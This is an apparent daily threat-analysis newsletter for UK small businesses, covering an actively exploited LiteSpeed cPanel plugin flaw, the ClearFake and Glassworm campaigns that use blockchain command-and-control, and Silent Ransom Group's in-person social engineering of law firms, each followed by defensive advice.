Threat Analysis: Blockchain C2, LiteSpeed cPanel Exploit, and SRG's Physical Pivot, What UK SMBs Need to Know
Hello, Mauven here.
This is your Daily Threat Analysis for 27th May 2026.
Three items today. Two of them are technically significant in ways the headlines are not capturing. One of them represents a behavioural shift that should concern every professional services firm in the UK. I will take them in order of what you need to act on first.
1. Actively Exploited: LiteSpeed cPanel Plugin Flaw, Patch This Today
CISA has added a vulnerability in the LiteSpeed cPanel user-end plugin to its Known Exploited Vulnerabilities catalogue and given US federal agencies four days to remediate. That is the shortest standard remediation window CISA issues, and it is their way of saying this is not theoretical.
The vulnerability allows unauthenticated attackers to exploit the plugin to gain unauthorised access to affected systems. The specific technical details of the exploitation method have not been fully disclosed in public reporting, which is itself a signal, when agencies move this fast without publishing full technical detail, active exploitation is typically already widespread.
Here is what the advisory does not say plainly enough: cPanel is not a government tool. It is one of the most widely deployed web hosting control panels in the world, used by tens of thousands of UK small businesses either directly or through their hosting providers. The federal agency deadline is irrelevant to your situation. What is relevant is that this is being actively exploited right now, today, and the fix exists.
What to do:
- If you manage your own hosting on cPanel, log into your WHM or cPanel admin and update the LiteSpeed plugin immediately.
- If your hosting is managed by a third party, contact them today, not this week, today, and ask them to confirm the plugin has been patched.
- If they tell you it does not affect you without checking, that is a problem with your hosting provider, not the vulnerability.
The NCSC published guidance on keeping web hosting infrastructure patched years ago. The fact that actively exploited vulnerabilities in widely deployed hosting plugins still require a federal agency to issue emergency directives before people act tells you everything about the state of patch management in the hosting industry.
2. ClearFake and Blockchain C2, Why This Changes the Takedown Calculus
Trend Micro has published research on a campaign using the EtherHiding technique to store ClearFake payload routing instructions inside smart contracts on the BNB Smart Chain testnet. The Glassworm botnet, separately reported today by BleepingComputer, used a similar approach, resilient C2 infrastructure distributed across Solana blockchain transactions and BitTorrent DHT, and required significant effort from researchers to disrupt.
Take a moment to understand what this means operationally.
Traditional malware disruption works by taking down the command-and-control servers, seizing domains, blocking IP ranges, pulling hosting. Blockchain infrastructure does not have a server to seize. Smart contracts, once deployed, are immutable. You cannot take down a Solana transaction. You cannot get a court order against a decentralised ledger. The law enforcement playbook that worked against botnets for the last fifteen years does not straightforwardly apply here.
In the ClearFake campaign, the attack chain begins with JavaScript injected into a compromised website, in the reported case, a Swiss site, that queries the blockchain contract to retrieve malicious payload routing instructions. Victims who pass anti-analysis checks are then delivered infostealers. The ClearFake campaign has historically used ClickFix lures: fake browser update notifications that instruct users to run a script to fix a supposed problem. The script, of course, is the malware.
For UK SMBs, the direct exposure here is twofold. First, your staff visiting legitimate but compromised websites can encounter these lures with no warning. Second, if any part of your business runs websites, and most do, you may be the compromised site delivering the lure to someone elseβs employees.
The advisory attributes the ClearFake delivery to compromised third-party websites. What it does not say is that the use of blockchain-based C2 infrastructure represents a structural shift in how persistent and resilient these campaigns can be. Glassworm was disrupted, but it required researchers to find and exploit specific weaknesses in how that particular actor had implemented their blockchain routing. Future implementations will be harder.
What to do:
- Ensure your web platform, WordPress, Wix, Squarespace custom themes, whatever you use, has all plugins and themes updated and is scanned regularly for injected JavaScript.
- Deploy browser-level script controls or endpoint detection capable of flagging unusual PowerShell execution on user machines.
- Brief staff on ClickFix lures specifically: the pattern is a pop-up claiming the browser is broken and asking the user to run a fix. No legitimate website does this.
- Block outbound connections to blockchain RPC endpoints at your perimeter if your business has no legitimate reason to query them. Most SMBs do not.
The PureLogs campaign flagged by Fortinet today uses a structurally similar delivery, obfuscated JavaScript in a phishing email leading to PowerShell execution, and is targeting credential theft including cryptocurrency wallets. The technique is consistent. The delivery vector is the same. These are not isolated incidents.
3. Silent Ransom Group Goes Physical, What UK Professional Services Firms Need to Understand
The FBI has issued a warning that the Silent Ransom Group, also tracked as Luna Moth, has escalated its operations to include in-person visits to targeted law firm offices in the United States.
The groupβs established methodology involves callback phishing: sending emails that impersonate IT support services, persuading staff to call a number, and then socially engineering them into installing remote access tools. That campaign has been running since at least 2022 and has been consistently effective because it bypasses technical controls entirely, a human being installs the software voluntarily.
The escalation to physical presence is significant. Reports indicate actors have attended offices under the pretext of providing IT support, using the physical visit to either install access tools or exfiltrate data directly.
This is currently reported against US law firms. I want to be precise: I am not aware of confirmed UK incidents from todayβs reporting. However, the groupβs TTPs translate directly to the UK professional services sector, solicitors, accountants, consultancies, which holds exactly the kind of confidential client data that makes extortion viable. The leap from US to UK targeting for a group already operating transnationally is not a large one.
What to do:
- Establish a clear policy: no external IT personnel enter your premises without prior written authorisation from your named IT contact or senior management. This should be documented and communicated to all staff, including reception.
- If someone calls claiming to be from your IT provider, verify by calling your IT provider back on a number you already hold, not one the caller gives you.
- If you receive an unexpected IT support email asking you to call a number, treat it as suspicious until verified.
- Review who has physical access to your offices and server rooms. Tailgating, following an authorised person through a secure door, is the oldest physical intrusion technique and it still works.
The NCSC has guidance on social engineering defence. The gap between that guidance existing and UK professional services firms actually implementing it remains significant.
Also Worth Noting
The NCSC published new guidance today on designing Zero Trust Network Access architectures. The substance is sound, the core message is that ZTNA implementations need to be built on genuine zero trust principles rather than bolted onto existing perimeter-trust assumptions. This is a worthwhile read for anyone currently evaluating or deploying ZTNA solutions. It will not help you if you have not patched your cPanel plugin, so get that done first.